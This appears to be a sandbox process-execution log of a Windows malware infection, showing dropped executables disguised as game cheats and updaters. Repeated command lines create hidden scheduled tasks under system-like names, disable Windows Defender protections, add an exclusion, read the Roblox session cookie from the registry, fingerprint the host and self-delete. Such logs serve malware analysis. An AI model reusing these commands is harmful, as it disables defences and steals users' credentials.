"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C67.tmp" "c:\Users\Admin\AppData\Roaming\CSCFBCF61A8141645BEAB9116A612B9A.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnve3ylj\gnve3ylj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA6.tmp" "c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\hostNet\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X6ugBa7n7B.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Program Files (x86)\Common Files\Services\wscript.exe

"C:\Program Files (x86)\Common Files\Services\wscript.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

